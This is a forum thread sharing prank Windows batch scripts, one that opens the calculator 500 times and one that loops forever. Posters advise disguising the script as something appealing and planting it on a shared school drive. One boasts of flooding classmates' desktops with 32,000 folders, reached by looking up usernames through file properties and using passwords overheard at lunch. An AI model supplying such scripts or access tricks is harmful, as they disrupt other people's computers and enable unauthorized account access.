I just made a batch that opens the calculator exe 500 times.
If anyone wants it. Just open up notepad, copy this, paste it in there, and save it as Calculator.bat. (Make sure to select all files, not just as a .txt)
(Yes, I know I wasn't supposed to use a GOTO, I used a goto because **** you that's why)

@ECHO OFF
set x=0
set x1=500
:loopstart
start /d "C:\Windows\System32" calc.exe
set /a x = %x% + 1
IF NOT %x% == %x1% goto loopstart

It worked but it gave up counting at 381.

I prefer:

@ECHO OFF
:a
calc
goto :a

Save as something people will want to open, if you have access to a shared drive(like at a school) upload it in the most visible place there. Also, it's great fun to replace calc with explorer.

Since the post said "500", I thought I'd go the extra mile and limit it to 500. I haven't did anything with variables for the batch programming language. So I thought why the **** not. Besides, infinite loops are detected these days with 7 and 8.

Really? Because my schools run 7 & 8, and I had loads of fun tormenting people with this kind of stuff. My absolute favorite was an application that made 32,000 folders in whichever directory it was ran in. That was a LOT of fun to put on people's desktop's(which was easy because you could find their given username by viewing the security on anything they put on shared drives, & the passwords are numbers that they say out loud daily in order to get lunch).

I think so, that's what masterjogi said.
And in my school, they didn't even bother with individual usernames for each person. It was just one username for all 4000 kids. But it's not linked up to a network or anything.

Does it open up the calculator at least 1 time?
What OS are you running?
Try replacing
>set x1=500
with
>set x1=2
and see if it opens anything.

Make sure you copied everything. For instance, if you left out the last t in the last word "loopstart", it will try to go to the label loopstar, which doesn't exist in this bat. So it'll just keep going and finish the code.

It bothers me that you're using x1 instead of y.

It's an old habit I picked up from Mathematica, my first programming language. I would work on huge overly complicated projects (mainly because I was bored), and separate sections of notebook and give each variable in a section something similar to x1, x2, x3 to organize it. And ever since then, I would do the same thing for all my projects.

Actually, now that I thought about it. Give me an arduino, a motor, a speaker, some gears, some scrap metal, a fleshlight (nevermind, I'll just use my own), and I'll actually be able to do it.
